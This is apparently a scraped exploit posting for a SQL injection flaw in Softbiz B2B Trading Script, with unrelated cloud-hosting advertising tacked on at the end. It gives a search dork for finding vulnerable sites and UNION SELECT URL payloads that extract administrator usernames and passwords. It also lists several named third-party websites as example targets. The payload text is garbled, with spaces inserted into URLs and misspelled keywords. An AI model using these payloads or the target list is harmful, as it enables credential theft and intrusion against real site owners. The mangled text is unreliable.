Why?
[+] Softbiz B2B Trading Script SQL Injection Vulnerability
[+] Google Dork: inurl: cat_products.php? Cid =
[+] Expolit:
Http: // localhost/path/selloffers. php? Cid = 1 + union + all + select 1, concat (sb_admin_name, char (58), sb_pwd), 3, 4, 5, 6, 7, 8 + from + B2B _admin --
Http: // localhost/path/selloffers. php? Cid =-1 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + sbbleads_admin --
[+] Example:
Http://www.trade.cn/selloffers.php? Cid =-1% 20 union % 20 select % ,,2, concat (sb_admin_name, char (58), sb_pwd), 10%, 20 from % 20b2b_admin
Http://www.tradedee.com/selloffers.php? Cid = 1587 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + B2B _admin --
Http://www.ezilon.com/ B2B /selloffers.php? Pg = 4 & cid =-369 + union + all + select % 201, conca (sb_admin_name, 0x3a, sb_pwd), + from + sbbleads_admin --
Http://productb2b.com/selloffers.php? Cid =-1 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + sbbleads_admin --
Http://www.myb2bexpert.com/selloffers.php? Cid =-4 + union + all + select % 201, concat (sb_admin_name, 0x3e, sb_pwd), + from + B2B _admin --
Http://globalpurchasers.com/selloffers.php? Cid =-1 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + B2B _admin --
Http://esytrading.com/selloffers.php? Cid =-1 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + sbbleads_admin --
Http://globalxc.com/ B2B /selloffers.php? Cid =-1 + union + all + select % 201, concat (sb_admin_name, char (58), sb_pwd), + from + sbbleads_admin --
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
